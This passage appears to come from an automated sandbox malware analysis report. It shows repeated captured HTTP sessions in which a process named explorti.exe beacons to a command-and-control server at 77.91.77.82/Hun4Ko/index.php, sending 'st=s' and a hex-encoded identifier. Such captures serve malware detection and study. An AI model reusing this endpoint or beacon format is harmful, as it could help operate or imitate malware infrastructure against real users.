                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:09.680342913 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:09 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            26192.168.2.46391777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:09.799104929 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:10.512187958 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:10.522448063 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:10.811939955 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:10 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            27192.168.2.46391877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:10.928776026 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:11.610985041 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:11.611723900 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:11.826442003 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:11 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            28192.168.2.46391977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:11.944277048 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:12.644160032 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:12.645042896 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:12.865864038 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:12 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            29192.168.2.46392077.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:12.975804090 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:13.691320896 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:13.692271948 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:13.917201996 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:13 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            30192.168.2.46392177.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:14.039319038 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:14.745131016 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:14.745840073 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:14.969688892 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:14 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            31192.168.2.46392277.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:15.085325956 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:16.004910946 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:16.005192041 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:15 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:16.005776882 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:16.248869896 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            32192.168.2.46392477.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:16.366018057 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:17.070667982 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:16 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:17.071520090 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:17.291347027 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            33192.168.2.46392577.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:17.412875891 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:18.102931023 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:17 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:18.103977919 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:18.319736004 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:18 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            34192.168.2.46392677.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:18.432569981 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:19.131287098 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:19.132237911 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:19.352888107 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:19 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            35192.168.2.46392777.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:19.459917068 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:20.147074938 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:20.147958994 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:20.364590883 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:20 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            36192.168.2.46392877.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:20.475770950 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:21.172013044 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:21.177172899 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
                                            Cache-Control: no-cache
                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 42 42 33 32 39 37 30 42 31 35 41 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7BB32970B15A82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                            Jul 2, 2024 08:27:21.398348093 CEST196INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:21 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 7 <c><d>0


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            37192.168.2.46392977.91.77.82808040C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                            TimestampBytes transferredDirectionData
                                            Jul 2, 2024 08:27:21.507508039 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 4
                                            Cache-Control: no-cache
                                            Data Raw: 73 74 3d 73
                                            Data Ascii: st=s
                                            Jul 2, 2024 08:27:22.193919897 CEST219INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0 (Ubuntu)
                                            Date: Tue, 02 Jul 2024 06:27:22 GMT
                                            Content-Type: text/html; charset=UTF-8
                                            Transfer-Encoding: chunked
                                            Connection: keep-alive
                                            Refresh: 0; url = Login.php
                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                            Data Ascii: 1 0
                                            Jul 2, 2024 08:27:22.194670916 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                            Content-Type: application/x-www-form-urlencoded
                                            Host: 77.91.77.82
                                            Content-Length: 154
